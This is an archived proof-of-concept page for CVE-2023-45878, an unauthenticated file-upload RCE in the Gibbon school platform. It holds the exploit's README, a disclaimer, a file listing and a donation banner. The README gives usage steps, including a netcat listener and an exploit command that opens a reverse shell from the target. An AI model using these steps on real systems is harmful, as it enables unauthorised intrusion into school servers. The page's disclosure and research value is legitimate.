Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-45878 PoC — Gibbon 安全漏洞

Source
Associated Vulnerability
Title:Gibbon 安全漏洞 (CVE-2023-45878)
Description:Gibbon是一个解决教育工作者每天遇到的实际问题的学校平台。 GibbonEdu Gibbon 25.0.1版本存在安全漏洞,该漏洞源于允许未经身份验证的攻击者将任意文件上传到应用程序,并在底层系统上执行代码。
Description
CVE-2023-45878 easy exploit | revers sehell 
Readme
## CVE-2023-45878 GibbonEdu Gibbon Exploit version 25.0.1

## GibbonEdu Gibbon version 25.0.1 and before

GibbonEdu Gibbon version 25.0.1 and before allows Arbitrary File Write

## Read More
https://nvd.nist.gov/vuln/detail/CVE-2023-45878

https://herolab.usd.de/security-advisories/usd-2023-0025/

## Disclaimer
This exploit is provided for educational and research purposes only. Unauthorized use of this code against systems without explicit permission is illegal and may violate cybercrime laws in various jurisdictions. I assume no responsibility for any misuse or damage caused by this exploit.

It is the user’s responsibility to ensure compliance with all applicable laws and ethical guidelines before executing this code. Do not use this exploit for malicious activities.

## Info
This exploit works exclusively on `Windows Server`. If the vulnerable version of Gibbon runs on a `Linux` server, you will need to modify the exploit accordingly.


## Execute
1. Run netcat: `nc -lnvp <PORT>`
2. Execute the exploit:  `go run gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>` or `./gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>`
File Snapshot

[4.0K] /data/pocs/2fda8abd903ac73f9c61d04b35011fd5e7768a6e ├── [8.7M] gibbon-rce-exploit ├── [3.9K] gibbon-rce-exploit.go ├── [ 37] go.mod └── [1.1K] README.md 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.